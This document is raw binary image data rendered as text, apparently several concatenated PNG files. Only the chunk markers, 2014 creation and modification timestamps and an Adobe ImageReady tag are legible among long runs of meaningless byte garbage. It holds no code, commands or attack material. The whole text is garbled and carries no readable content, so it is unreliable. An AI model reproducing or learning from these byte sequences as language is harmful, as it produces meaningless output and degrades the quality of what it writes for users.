&�%�|˽36'�P���0�{|83���w���������ܜ���k}���ɜ�ow��w��6��u;7��;�`�0ظL6���;�`�0ظL6���;�`�0ظL6���;�`�0ظL6��f�e��worE��jc�^bپ����:n��P���F��y�yu�-�dߛ�͕^�����Z�3�Wɬ����M���fS9y��k9u�[�z_ł7�s_�\+��%sA_m��x�Ea/��k}��X�@��y�}����#��{�c�*���?�6��?~���}?3TX	�We��~ؽ��M��')k�(�U��r%��	y_M�m�^e��v�V��r��f�WC�X���ZuXbm�e3/�y�������:�Q�.�߶S7�����G�uU�T�Ӫdvx#���^y�x-G׻����׾UA&h�<,�ކ�tH��2��;����a�5��vw�ȝ�q=���Gz�[����vn����W���Ji���]�YWRɑ�^T}��R���֔:Q|�RRo%�͠�YV�+s���j
=��U��nJU��)k�R-�Օ�������F�W޵N��==��X���j��%o�5F��֫��x��,�˕d6/Ɣ�J.�^�߾��U��Sa�ڵe���+��1�c����m�)�^q)�S��:��ڤ�S<��FW�΅������dj\���(i����<eGɑ2�t��>-,�㭓�Wz���5�W��E�3H���G�)��ve�ZQ{�m�ú���I�f��^yƥ�֭ٹ�w>%�:%:�3Hϸ��*y����{E��R����q�
�Se&�L6�`�a��U��f�y�	�^���Sefa;�O�z
�}��׵SˇU�2�f[nqw�߁�
IYV��
���RW�Ʊ��B-��Uf�'%�S��6W���ʎn��s���pO��ل'�ׂ���r�ҳ\˷v5S��[�n��S~53�|�����w9
����e���Y���\�9������pe�a�'z{{,;:݂QyF���G�l��ҧ<�<;z/E�X
%v������T{œ���ڦbѵ���<*Y��|+����uuKհ�z��"�75n޺�e^+*)sS�
��-<�-ך)ޖy
xuV���YW>ςmY��Φwס��� k�|�������iX!|�
0�� S������ǽ�q{�C����˒S�|���g�g��?&S>���0�������Pt�fM��E��ΠR�vt��[z���]�4]me��*բ�%/w����ay���c)�
��ͻ�Wy�)���;C�>��~,^�+u�K_�ymg�[�%+�����7��3�U,��ג�qj�V˰v��?����0ǿ?�Ӧ��6㟕�޻�%��}7A�>�l*�ǿ>,��&��B�e^��j�ixkl�����M��*}ش���e���\�s��ͼ���*�Mc�ϗ<�y���q]߸������{�6qK�B�����ݼQRR����Q{.�A�DQқk=w^�tl��*\Ϡ������zU�m֪L��Z�K�֫R^�^��^ޕJ�A�]��|e����]����x���g�kYNyk8��t
�q�~*j�]W���M���n!eӛA=ޒ���o��<���<{�2�W�,l�ӡ��΀mMo���Nl3�U���O�}�q_ot�W�u��2zyf���L)L�X^W�2)��jX�[+��k=�[+���\[�[O�xן��WF��iJ��+m��+5�E樓^��굡�oykW�sI�Z���(��]O��ʛ�y9-���ػ�?y�ѝ�T��q�`����'�,��v�2��ws�S��n�ܓ��l������������SRѪ.%���Z���jn�TKy%^o\yJtֳ�B�͔oފ]͚o+���1z=�V�؎R�u+Y���J��u}��9�d�k9ϫ�^R��5\��t�>�'z�%w�b�ǔ�%3´�|�K���ޭ�;a�GgUv�S$w�����^���?�^z���(���f�ᵜꫫ�蟧dyf㾺�%Q�m�|��Gɋ׾]j�g[
]�1��aG��3v��Z��ѥt��ս�g���{��ҳ���k���Wc�,+ת��[�U�爒Me%��|��*ϝZ+F��~=�Ey��D�����4�p��6�y�=�������~�������/~~��pݢD|�?�?.��{W4��][�������f��
:'�继�����S�	`�tO����Y���p�'|�?z���G����"k��������3���÷�'2��׿����v��v��lq�6'�3݅���[p��?��z0��랾I�{��f��τG³�6wvol� �lx�{p�2��Lw�מ������?
��bO����n�����T�~�4-m.���|,\
�7��
�	�ép:���=;�ݓ�s�Sݝ፭�~[�H�l�t�7��c���]ݍ�?ս�ug�=��.�;`hK���W~��O��
�����,l}ͩ���Ӎ��㾭_;��4���f��\��a����_Z>>o���{z�{y����
oL,�^x�/z�bx��B���n�W>��Xw�0qn�tφ{�
�m�7óݧ�˳��p{w&\�
���<r��p�{w���X'�s[O_{I	>���߱|!\N���_�����?�аpb�B��
���_�/-;�5������J0�iG���+��ſX��
^C:�=ץ?��xp"��.��t��-���G�
|f��/9|>����{뼣@	�t،��F�����/�W›}���aK�z{8�}���O�b��|���y��v�U�K��z)�0�0���;�[K��ʯ2��|����-i�ꛚJ�?SsmӪBGѼE���ُ���L��cZ�RK]��l}}�[�&^����Sa',�~���-���?�/�_�`�e ��O����ã�q��y���հ�f�bi�X���bE����Z���l�4d��ſ������n��s�&w�	0˰?�w�>���&�<|�2���S�����G���6��x,��w,�)��u=)�]��o;��F)�\���@�?��mQϵ�k�3(}�֌��>䭐�Ʋ�ӽݴ5'�E�,Ԋ��&�^5�ά�ueF�d�|5�G���|l�W)y��}������t����_x��0�^������H�~�4f����3W�Se`��q*���e��`Ù�e��T�͆�S&@��e��_�N'ۤ�*x-���}���R*���S���ؚԭ�q����VR�+�^U�J"�e�u�Jfz�lz}�G�������37�^��^��5[�rel��ѕ�L�zz��#z�JEy�����V�<�ک�]Z<O���-��O�=�Z���N����0�a�s���ë2`����'���,��v�6����z�)c���.��x�����*��9��ҟZ>��>�z�WJ���R��]�t=?	�d��2��G��+�-�ݾ^�>���m�k�LY��Ђ�JSlz+Qf�wezt�˰��v�3/�ٯ~g���L�yX�}6���<,���l6é2���v�ò�U�
�2�'���U3�tu��j�����J��j|%u7���MY�U�[�Q+j(��
�l�y����MϣR�y}mU�Xl�F�W
%�>��}E�<V&��gܻ�c��b�][�rky��zr�)�y��uIW)�D�$�͔}���cz�TK=�ާ@�>D�֋�fRZ�R��{"��x#���[��gG�g������3�k�PuN��#����?���ۏ��+w�^q���2�=���Q���%��t�b}�(�l��J�꠫��Z��^�e���?�6l�������lyU(Q(�ӕO�;�_��%/j]�8޼u��F��^��5f��K�E��$��sM��;��Q��uЭ�zv{hG�u�Ȧ�n���~�o���Y؞���km���p�����+ަ�{-�ގ��-��t˶}�2��a��zS~֚�v�{��G��[b!/׵"�^/�k-*Į
��:�GO���d[{�K�(�R�}o5zs�7���u>]�+�*���ܫ��V���U	%���9b����?�Rf`%̯���>[f���[<��F7���ܪ������2�|�+YK���l�&�R���ϔ���ڲ�������Nޟ�Sa'\���J]�ۙ�����ڤ�*c�q��O����oI.t��XR�)��T����C�(ʈ6z,v����*֫����[��:I���nxk>�%w�̋W�<�v.=k�izf��P��vs�����+��#=.�oys�d'�����[w>��J����$�ֻ\�oܗ�^�f]�n����J|7�ؾ�}��65J|7�%5��>E��m_�=e�V /��)�m�۵dgS�W���W������N�B����ʪ��	��z��Y��c��X˫.}�(��Z��>�tUKf��������J��������z����+����d���P�S���'Z�ڊyO���Xj=�J���W�~������i�
f�<��&uXRk�ƭ���E;�7S刺v>�x�S�*kG�QJ"ڜ��o7A�Z�|���צŨy�n�[�����j���`-�#GO�������
�p:�X(��T�1%ǁ�U��0�} ���<O�d�K׶��1�&�[7��zԊ�1%�+1�W��g{���֔C��l[��譺�C�y��*���7忽2+����UTҏS̛��Q�+C���$#ywK���æ�S�͑Z�̎Z��>�U�=��)��zN��z,˰��v�Ϟ���w�Vȼ��^-��mq�Jݯ��M���m�q�:E��7�J�-N�Q����S���jN𰕬unI�z��E����f�7oŶ��^e��5�{׸�~���u+Y���J��u}��9�d�k9ϫ�%g�(g����(�}
��Ob�N(Z�
�w�MɌ0�w�_:��_
˰v�,l˿��׾��p}`|7u]�<�g!�F���5=n��.uW�D�G�-&�>�WJ[ɔe��%���h�T>Cˣn珒}E��xgJ���U�FT��7F��j���*�ت��z�[oF�V�Zs�D
�NI~u�jE�n�<���c򞹵f�W���2��n�}�le�+a޿{�GW?�n7���<a�`c_%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDRd2��gAMA���a cHRMz&�����u0�`:�p��Q<bKGD���1�XIDAT��½
@@�я4t��U3��#�U��9�-xy<��'��+w���-n���[bfL��1��&T�<�2G��R.�����%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDRd��tgAMA���a cHRMz&�����u0�`:�p��Q<bKGD������	X���IDAT(��1
�PDSZ6�M���!r�����K�J�F��f,>Ao�`�x;�,,�cs��p�����>҇uQ`߯i%�����S)�~�ζ�rV
�=O・�� p�l���:]��Z���O���?�q�|%tEXtdate:create2014-10-16T11:29:35-04:00���%tEXtdate:modify2014-10-16T11:29:35-04:00��dIEND�B`��PNG


IHDR�E�r@gAMA���a cHRMz&�����u0�`:�p��Q<bKGD"�b�TIDATx��m�%Uy�
$!,h ,�%�&���@�|I��EM�r�ݱ�D���2;�f��܉A^$5�Ƣj^�K�@U���-wW���D`�|�q��"�t>������ν3}�S���~�9}�<�>��<�yNp	M�)����`�	�px�h�t%��y�Y��D�^`�O��r�%`:
$%�{��0L�L��?��a|��6��܉�]A�����7P�'@/:�]5JH�&�ay���2���:�8t�y����@����#*'��?��t緝;�Ywגm׸������{�>|Dg7��\J�{�4�K�����3���tf�Z�ޱ�`�7�u7��Yɶ~f]�<��4m�*�<%%�{�^`����FR��
��	l8<O������h8<O������k�2�n6cL��`>�]=u������$��,`�&�+h��k�6��J_*|�K�0��?@�lx��do��m�]�L�3�ݞߌ0.;���T�E,;��4�����t���MO���mP�L�U�A&����e��+��`�8u�]�5�77~"���h8<O������h8<��]��C8�Y��s���Z��}i�A� �֠�)ȞsW.!m�.��
���z[�#��R�䨚��
\R��{���v�����
�r	����R�� ?˝#��[�|�f���`��������y��)�A-��Q�N
�4w���Ϯ:Kr{���河�3��ZP�!0t�{l�\�Y�wSn�P�IA.�Vm�-�R��
$y����sI����@;��eغX�.�v����Yv���B
��n]g������Wc�Vn�*�ôyT�=M�hpt
��+�3�
�'@��	�px4�
�'@��	�p��C�`���=x?��.�j�lk�]�R
��Q.�ޫ5@�P�,[��Z�j6�ƵK��ɟ�ڕ[ ,�P/5/�t�h��zG]Yn�!�wk�9څ��R��+��@���Ktťa.��mK�uD�<i�5Еc�n��[@z��@VmP���g�Q�O���c��:�Ӕ%�{%��܄.緯�ןߖ�F{�h'��@�{����"ȕ�.=>M篂��U�!Lg�K�\A�t�$���Vr�����X˒��`L�o���Me�/��R����+X.�X.]�L�]N��q�%e�7w��"�<
���ּ��p�뻴�ʩ����@	 ��uǤ
O���O7�
�'@��	�px4��� ��P���d�r��vM{w�Q�v�e�{Ȯ]�0�d1w�%L,v���Qwq�yyx`]�jW�.���!��W��W�l�/������D3�,v�܁6]����iZ<:IݯtM�~�9��U��P�i!�s�nS�!�����Q�yU緯lJ�Ț����!$(�7��-��/ޮB¤F[�^�)F�#���*U��$`7���\��!�OU���Ū3��ǐ�_��J�:𨃏ܽ�X6��X���!��|�.��!}t�$ePR�OQա�/P[Cm�b,�=�����X�A��!�th��o14]�Z���h��=O������h8<��#@k��eE�ٲM&��I�KѢ�&�b���04(.�%�t�h��tIH�2���>���D�g�ͳ��]ݢ��@�N����E]�h���ɟ|�T=��m5���@�.#���B���W��2w�Q׿¨a�lrv��E��b)n�#��ය݄��F���/N���6�%�t���]���KX���"�nz��"�t.���'��`[��A-<�d�#�]/\����#
��sDbVG��ӫ��
@�����u>y�-�L��T�i 	rgW=�����)�l�j&�˺;Y��e��F��,��6��C�G_0l;���y�1|��5�'@��	�px4�S�L�T_ʿ���ߐ�:�AD����V��\�cK�
!��e�8�L�}F�{�=.�y��0�������~w,ݭ9�^n�	���gH���<�s�ٌ�g�d���}ܠ):�$:�N��"��<�S!,��qg
駹��\���v��'�g��{;W3�p�I��m���bn��i�;J�����)��s<.$_�.�[5�{�I�V\ⷸ"�[$@d	Ke�%b!���Ѯ���F���n�0#l�§��8o���($���%�f)@6���[L�9�(?�K��o�?wjSl2�^�9�E�L���
�VH)0ͭ�!k@}Cn��U�:l�|�4���
2s���P�R�Q,Q�g�d�p6صp�Ki�*���B�?O�_1�?Ʒ����d��'%d�;��§\��k:�?r7p#��'�r�eL3��[[$꿟3D
�N��_��8�״)��<��z����'�i�>�]Y�,b���}H!��0L�a�4-�U��ڣ$�R|��c��r�Q�x�/a��_��s�e�R�mD��z�$V��\��
��3<ɔ�0㗹1�VD��<�n&�S	��L�C�4�*��5�O���`K�A����`�5�D$�n��}�5����Bf�"�GP��M	rU/���j"�$���!f+��{/��fjt�k�P�t쇘�S��ӹ�r�#��q>#��a��=���5���!*�,6�~ ���^#J�t
Wg{ȃ�s�d,�o9�X1�	��?������*u�u�B��,=�`�޻�'���1l$[�Gx4�
�'@��	���DΞ��-���z���)�E}:g˖���	���gÁ����yk��>��fi�Na~������ɏ�k`�.���7���3P���ȸҜ�;����+
�Zp�Ml�b�in��F�ݬ��L�����پȓ4� ��:�a�.0J���N�.p�k8�NP��x���\lh݅x2i�ǹ?O�H��5M�@�.K4p�\a���/�>a������y�%�^��z�U��������2�5�O'�0��V�Os�M��R�4�"0V���ܞ�����Fq�y�Y����E��L��0])PK~I��rx/��Q�s�*SL1�fn��>��������6U4�>i�#�����\��}cJ��j�rjo�_u8�n�,���JF�g����yFk6�a[0�y�|���k�S�\6����+�����)L*g�	E�D�خq|Y_���'-?Z";�<�W�ϼ=��
��[��\I�L}���‹�7Oq��X�������
���4<��z�7�=~����CP�6w��'ƟL~*?7ȳg����%�n�pM��B��C{��
�L�^�O������2;C!�<��n��$7��B5F&XQ�?̧��>��-��c%D�P]y���_�VaX1�uҗ���E�c��_��t'�[���PP>�`���������4B�� "�O�7��Ց�F���3
�����<�5��ϝ|B�.0�#���b�b���]�,ҥK{�/QW�����ܯ���d������0���~�.�����ꏜ���}��eK�
��Y@�3>?�_��"��X,�u5OԘ��(��x�sG4DI�
��4�
�'@��	�p4���X�N�IM�s(�,�ѡ�ކ<&���R=>@]���ZG�^
_���H�k����|��p7�rF��p��,�/�^>G�-�B���+�7��(z3�d�-��A���^'����qzj����
��z_`�I:L0��T��|��a��Ʉ�܇<S���I�U̅囌3I'.G���Ó��Ґl�{U���R��̌"�g�h.Gj�����,�N�Ui��0`��rƀ1�G�lK�TQ��zy��"?���or�>���'���/CT��S̤�
U��
�(�.����2����Rr ?<
aG�B�Ks�RƔ[�I���lc��yl�U��_�ɷx����O�	�QH1N�c��Ӻ#�?5f4ߣ��3lg��GA��<�aW�9�w@�I6����8��F�߮��U3���hC'��aQ�?m��*�w���\�����9$�;`[���6q��5e�(�|�E��"�8��ODHF+���~��S��m<���*��M�ʖ
._S�9<�ΐ�ҫ�Q�w �ʼn�W)p�?����
gW,
�
'�!pF�Q�8�_/�_z������{!��X�Z7&9�W�&�E��f���!��GU)�ŸY�:�l���{����`s6�������Ãl��d��,Gyx��IC�
_�k���Jw�iK��s8��8�����Mq,y��
��S��V�{�ycP��I�#ి��űo���os�:�*�i�@Z���8]�^��e�xt7�)�%��-T,)�O�\N�K��Q���|�0w�f���Kl.X�����ګ�=_���;fl⧅��;ϱ�m�� ]/�O�B����.y�S���W�/�)���)�xsp;�+��<��.p�ƴjq��I�CE��[���kO���y��
�'@�Q$��6^�=|;���6�������o\
|�ˤt_���⽃��G}�{����K����T���{���q�8b�
�� vK���"�kK���/n8�'@e��6e^���j��Ԫ�p؀�����l)l�㩻���7h��kdC�]�H�4�nnF�[:b�	l�[�ꑬ�'n�(���|[�Ƹ����4%�t�]�BF�h�%Z`%>�nj��Ԅ&����"\r'V�Z�v�D)y�kC���bW�;�I[‰�k�!�����fui�Q����*t�W�s�N_�~W<�
��g�)�'8}ږjHz��D6���6Dkx��3���?��x����Fy
�z��no���O+�v,��bcx���sLw���xt�n�G��ĝl�Nn2�ھ�I�O�ΐl��Ɵw�
�gkг��=�ޜl��Al)l��[�k��;�)"W2:��-�.H�٥��a�q�6���6$\0��o����qnj����cC�[O������h8<O�":F�@�j1Xg� d�b�ݖ��3<c�w��
�'ú��la��jd�iiK�[:�J�w@!? ����~iy��
�0\���]������#cY9%��&
�B�s�Q�@�6[�sJ8�NI���W�߭C'�QۥdFPMP�8a#$��Q(��+K	:��e�B�zi�X|�N�~<Ɯ��G�c̥��5P�\|t+ss(A[����P}��
���|-V���ܘ `�UZLh��v��$0���sƼyihH�� ��?K��Q`�a��#d�*���A��S#\j=��i�,]������6�
�'@��	�px4E���zl@dh���!M����U��c]"!@�n~�R�J%O2�!�E�a��h�=P�~`��$AG��S����r5�2r���b&ATZ�-J��C��-����W8�?�<��8ʽ��*[4�F�T�jG�p�8�&)�v�U<�U���j�i,~�|���?�=�lW��j�˻�RR�$�3�}�n�|TK5..�NQ�E���\�)�k������)ʿxS,��qE����������i�!�{q}�g�.��r
�g�U����Sq����s=W2^��)�.��[�AB�h��W�.��y�wȼ�=�}��0���6�O�8A���6�ϫ�
����O�
�'@��	�px4l�ԕ��T�
ž�����-���-��@]�-�\���A�+����õ��2���{]���$g�������-��h�"��M�M�-��|9�ZvY�?0䷕_,��m�o��9�	aa�.�I�����K�*V�J6[���B�:�n�.����a��P/0K�s����Զ_r�S�FOVh�	 �(��ɸ�����5���@Y����	P�}��x5y��o����E��Z���=����UJȯ|��?t�k3�=h���vn'SO��!`�Շ��]��~r	պpS�n=���ҝ/���A=�p�/c�����Nء�葜�&�(G)�JG�$6y�I�/�,�MP���%�P����(��i���CC~[�����v������W��B篾ꒈ�V���$˹�}��工�(�k&�
Z^�8�S�8>z�E�LHWW�����+�wx0�������-���pxk`��	�px4�
�'@��	�p�A�ܣDk�H��2u]���A��zwnP�E�x��Fy�A�u���m�	0F�0b�G:�1;L�6|�C�GI�C�H�R����ݿ6y��~˘�{�o}@���]�Q~"���h8<O������h8�/�~B�	P�-d����׻͒£"D�
��;R�򠫹 `�d]� a����{� �-�+�P�S#R������3@O z-�̒��
��¿r�vJ���Q��z��`W���_9�HG�x��\���E��A����2͌r��͠�&�~U�����>�w�S[�Σ��- `9�'C�~���C@�e�Cٹ�q�_��	��X�����z���N�%tEXtdate:create2014-10-16T11:14:19-04:00}#`%tEXtdate:modify2014-05-26T11:47:31-04:00��(�tEXtSoftwareAdobe ImageReadyq�e<IEND�B`��PNG


IHDR��IJ�gAMA���a cHRMz&�����u0�`:�p��Q<PLTE"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��"��an�XZtRNSXG|"2���wf�����ZNz�@e�S�F��caM�hm�s�}�����䁎]����������b�p�
Ιi�8*�yѧȓ�د�͐���ǫ�ʄbKGD�HkIDATx��]c۶�H�阒�K�8n�&s6/�^]�umԦk�:����z�����;<�R�h�l�G����@Y���� �d�Mز�0rz7/��	f@e�b��`@�c���`��r~��&A-�����
2���9��~�
�tΠ ����2'�L�`�Dz���x�0�O��;)��>��L�S:1��ǀ5��Ի�B������EDDDDDD���	n�JX��yO�4��'��|���J�����f7�ńU@	�D���!�!�~{�=ɖ��s�LBI�`�܂��f�hm����,�ף�mV$����=d�c@�.�=�s���i��ށG��/�B�ܽ�Ƿ�J��I��<\i�
�
���뷕�#���˜�: ��Hle����F�<\�|��O�d1�s�9+3;-�˟5�ׄ�H�,�0n9�o������=D�O�H./H��:ݩ۾\���dDDDDDD�ME�m�=݌IJ�]��
.U��ր�*���lm���.���^���N����Ɋt�o�o����zQ?/O��Z6�'^{Å��|x�K,�=��#�m���[;'��aK4��k4��je��NϷ؀�tFko��N�X�{��p�d0�	����z�`]�t�`���ę�1����XL��B ��$�
K�Z�����p�N���y���~>&"""""bԸܻ8wTȣ��36�X���n�;�����g`��Z/'����ʎ�;��7}�jm��tx�շd��0�O/!`/�/���$���3�j�^_pМ��7N@n�H,�0o�'����i ���� ������M�}�R���Y�@����;=������[҉`��O���a���<1�^C��B����k��_DDDD�Fz�od�|�U��5��i)���bz_ip5RR�WbT�!l�@�R5�Cf|�Be:��.�3��m�G/t{��߈��"��g���M`\X��9A)�)�SXb7t,i��X����;6*�@�+4t�F�#H�M�����
2�1�&C��!�O�
��/��+���n��}HFH@_t�?""""�f!S~B�~�[�[C�n*7��r���`�r�\*f49��qK���E
@g�JqW8d�(n� '4*�^QL��W�mR�Es�����C߶�Tf+[�uz��I�	���t��U��m5�AZQiB�� 1�D'���Y�D�JCc���8]�&�{0���������TG$!	&�j�I����`
�CU\��h���<�@��{��1�{�.���J��}L�iR �7m>H�UxW�i�Ju���y�����U>�b����.p��K!/�|oO��ׯ$@����nr@I���0pxx�`_2 ���?-� �x��~�9pT
�GDt'�=�!���|/\�
�����c�&�, ۟N����&�B} ��<�9~Fu!y���;�L`X�\��!�-����&-����%b2�1v
F���.�7��N���N����������U~�# �
V홛s0��uW80�-p��%�d��C�-Jt��������v7�DDDD����?=�6�m�#A���G�m�Q#�vc�kyޞ[�&�k�B�������d�u@��6�?�43�E��S��&�wZG�JE��?�]�y�Yi2=�\��k��h5(�3����Tq;���1�c��r����7o�_�;�9f~/_{�A����o�
��B�A��?�6�Bn�”&HV�_,\
��ٯ������.R�:V3mt�	�fO<}v��6ʤ}g�=^����`��Od|��x�S߷�kg>����80����v���(�,`�
u���h�.l����)�cb����,��C��j�j�[Rߧ��i�2�DZ�1@�&�Ƀ?�/�����	H��uj��g�O�c���|��(��9h���h��a��0��C#^$d�a��#�$ɟrwv�__��~S��z�¼z�u�Z����ZV���wZ	j�P*ܓ�@&��
�w��H�����8�,��<�O����r����%@���s>St�Qs��M�?�N{�
0>yA���AQm�����=X	rqQt�
(""""b��i��1��\�y�[U�޻�iA
+��·�@����W_
_���)�K�?�܇'O�&��h����V���M9̦��/a!��Q�	������¿�+���,�iӍؔ=d]�:�t3���*AW�1^��n�_I�r��J���4M���=�ݷ�=S���P�-#PNF�
���*R�kgj>�L���
W�u4����K!�Z���?5�Ci���/e���0!2���uP�T�)�9�-`>���3^j��M�Q�i�`����ol�_]�f�v%�e��(���O����H�4���p�,�D�Ϟ�?;�����u��@-�Rnf�j�����ġy�&��+[}J|.Ȇ��s8;S�/���A2|_�5J��G���W{p�P�a���i���s�fgggp����M���Y����s=a%G@��j��h��m��`i%cL0�k؇�����?��G�a���H�H��I=��_�"�Q��&���˚
�����ի#$.�W��1�`�s2"""��xw������m7j@\\�ͨ�㶛5�)u����ꎣ޵
,a�O��ř��y�,�_�/h]\���h޴9��`�#
M	[z��KuO_z˿Dܫ��*��kOJ�(7��v��\�e�
I�T}aTn�a��*���ba�oۺ�HX����a�E��zn
��NS�����&Sn4��A@��r8OW+�&�����bov,
�zh���&��T���ǀa�5:�=��S���D0��}b�!p��Zpވ�XG:`�����?�iYx��6�0�ي������KF>�3�Ȭ��D��P��#^>@(0(�R������ȠB�F�W���mA|�%C�B6 &&UZ����H�h���	��"�07�B�L	(�?�F�3��:&`f�)��!n��E���[��c��ǀ��|�c�w�`�~@DDDD�͆�9���~��ݔ^��
��\�)�\�������7���UV�?I�@��+3�}�T���&�
)�
�s!N��֫Cњ��jE&��n߆s?����'�5�{���O���v��9(�-�o�_Hu����K��J�G���PZ��)��j\X��_ThM��<:��{��y������ �����a����!)l�?\�
���>W�����ޠ��d����ܵ��r�L��u����W^h�z�n��*w���}>�.��ϕox^��V�2�U+��3��N�_�7]��$邶_��|]�rS��W�����p(?Og���-���?�h���_��!��\_�L�CV���47��L!~B@�=��u�g���#`����B��B��-Ⳁ3Q�6�.��}�������v)A�SY2p���>`ԚAPbt�*�U� I맃�����Uh� ������v��ڑ��Hu��ڕ��Jw�#""""""<��K�G���5$��/��� �?=7��$�L���%�7vD��c�M�DDDDDDDl����� !��5!�h�HD��k@��U�@��R��Pno/_ڵ7S_�Cu�������W�_�kU���_��8�c@Z��cA��w�1r����}݇O%tEXtdate:create2014-10-16T11:14:19-04:00}#`%tEXtdate:modify2014-05-26T11:47:31-04:00��(�tEXtSoftwareAdobe ImageReadyq�e<IEND�B`��PNG


IHDR��IJ�gAMA���a cHRMz&�����u0�`:�p��Q<PLTE�������������������������������������������������������������������������������������������1�8ZtRNSXG|"2���wf�����ZNz�@e�S�F��caM�hm�s�}�����䁎]����������b�p�
Ιi�8*�yѧȓ�د�͐���ǫ�ʄbKGD�HkIDATx��]c۶�H�阒�K�8n�&s6/�^]�umԦk�:����z�����;<�R�h�l�G����@Y���� �d�Mز�0rz7/��	f@e�b��`@�c���`��r~��&A-�����
2���9��~�
�tΠ ����2'�L�`�Dz���x�0�O��;)��>��L�S:1��ǀ5��Ի�B������EDDDDDD���	n�JX��yO�4��'��|���J�����f7�ńU@	�D���!�!�~{�=ɖ��s�LBI�`�܂��f�hm����,�ף�mV$����=d�c@�.�=�s���i��ށG��/�B�ܽ�Ƿ�J��I��<\i�
�
���뷕�#���˜�: ��Hle����F�<\�|��O�d1�s�9+3;-�˟5�ׄ�H�,�0n9�o������=D�O�H./H��:ݩ۾\���dDDDDDD�ME�m�=݌IJ�]��
.U��ր�*���lm���.���^���N����Ɋt�o�o����zQ?/O��Z6�'^{Å��|x�K,�=��#�m���[;'��aK4��k4��je��NϷ؀�tFko��N�X�{��p�d0�	����z�`]�t�`���ę�1����XL��B ��$�
K�Z�����p�N���y���~>&"""""bԸܻ8wTȣ��36�X���n�;�����g`��Z/'����ʎ�;��7}�jm��tx�շd��0�O/!`/�/���$���3�j�^_pМ��7N@n�H,�0o�'����i ���� ������M�}�R���Y�@����;=������[҉`��O���a���<1�^C��B����k��_DDDD�Fz�od�|�U��5��i)���bz_ip5RR�WbT�!l�@�R5�Cf|�Be:��.�3��m�G/t{��߈��"��g���M`\X��9A)�)�SXb7t,i��X����;6*�@�+4t�F�#H�M�����
2�1�&C��!�O�
��/��+���n��}HFH@_t�?""""�f!S~B�~�[�[C�n*7��r���`�r�\*f49��qK���E
@g�JqW8d�(n� '4*�^QL��W�mR�Es�����C߶�Tf+[�uz��I�	���t��U��m5�AZQiB�� 1�D'���Y�D�JCc���8]�&�{0���������TG$!	&�j�I����`
�CU\��h���<�@��{��1�{�.���J��}L�iR �7m>H�UxW�i�Ju���y�����U>�b����.p��K!/�|oO��ׯ$@����nr@I���0pxx�`_2 ���?-� �x��~�9pT
�GDt'�=�!���|/\�
�����c�&�, ۟N����&�B} ��<�9~Fu!y���;�L`X�\��!�-����&-����%b2�1v
F���.�7��N���N����������U~�# �
V홛s0��uW80�-p��%�d��C�-Jt��������v7�DDDD����?=�6�m�#A���G�m�Q#�vc�kyޞ[�&�k�B�������d�u@��6�?�43�E��S��&�wZG�JE��?�]�y�Yi2=�\��k��h5(�3����Tq;���1�c��r����7o�_�;�9f~/_{�A����o�
��B�A��?�6�Bn�”&HV�_,\
��ٯ������.R�:V3mt�	�fO<}v��6ʤ}g�=^����`��Od|��x�S߷�kg>����80����v���(�,`�
u���h�.l����)�cb����,��C��j�j�[Rߧ��i�2�DZ�1@�&�Ƀ?�/�����	H��uj��g�O�c���|��(��9h���h��a��0��C#^$d�a��#�$ɟrwv�__��~S��z�¼z�u�Z����ZV���wZ	j�P*ܓ�@&��
�w��H�����8�,��<�O����r����%@���s>St�Qs��M�?�N{�
0>yA���AQm�����=X	rqQt�
(""""b��i��1��\�y�[U�޻�iA
+��·�@����W_
_���)�K�?�܇'O�&��h����V���M9̦��/a!��Q�	������¿�+���,�iӍؔ=d]�:�t3���*AW�1^��n�_I�r��J���4M���=�ݷ�=S���P�-#PNF�
���*R�kgj>�L���
W�u4����K!�Z���?5�Ci���/e���0!2���uP�T�)�9�-`>���3^j��M�Q�i�`����ol�_]�f�v%�e��(���O����H�4���p�,�D�Ϟ�?;�����u��@-�Rnf�j�����ġy�&��+[}J|.Ȇ��s8;S�/���A2|_�5J��G���W{p�P�a���i���s�fgggp����M���Y����s=a%G@��j��h��m��`i%cL0�k؇�����?��G�a���H�H��I=��_�"�Q��&���˚
�����ի#$.�W��1�`�s2"""��xw������m7j@\\�ͨ�㶛5�)u����ꎣ޵
,a�O��ř��y�,�_�/h]\���h޴9��`�#
M	[z��KuO_z˿Dܫ��*��kOJ�(7��v��\�e�
I�T}aTn�a��*���ba�oۺ�HX����a�E��zn
��NS�����&Sn4��A@��r8OW+�&�����bov,
�zh���&��T���ǀa�5:�=��S���D0��}b�!p��Zpވ�XG:`�����?�iYx��6�0�ي������KF>�3�Ȭ��D��P��#^>@(0(�R������ȠB�F�W���mA|�%C�B6 &&UZ����H�h���	��"�07�B�L	(�?�F�3��:&`f�)��!n��E���[��c��ǀ��|�c�w�`�~@DDDD�͆�9���~��ݔ^��
��\�)�\�������7���UV�?I�@��+3�}�T���&�
)�
�s!N��֫Cњ��jE&��n߆s?����'�5�{���O���v��9(�-�o�_Hu����K��J�G���PZ��)��j\X��_ThM��<:��{��y������ �����a����!)l�?\�
���>W�����ޠ��d����ܵ��r�L��u����W^h�z�n��*w���}>�.��ϕox^��V�2�U+��3��N�_�7]��$邶_��|]�rS��W�����p(?Og���-���?�h���_��!��\_�L�CV���47��L!~B@�=��u�g���#`����B��B��-Ⳁ3Q�6�.��}�������v)A�SY2p���>`ԚAPbt�*�U� I맃�����Uh� ������v��ڑ��Hu��ڕ��Jw�#""""""<��K�G���5$��/��� �?=7��$�L���%�7vD��c�M�DDDDDDDl����� !��5!�h�HD��k@��U�@��R��Pno/_ڵ7S_�Cu�������W�_�kU���_��8�c@Z��cA��w�1r����}݇O%tEXtdate:create2014-10-16T11:14:19-04:00}#`%tEXtdate:modify2014-05-26T11:47:31-04:00��(�tEXtSoftwareAdobe ImageReadyq�e<IEND�B`��PNG


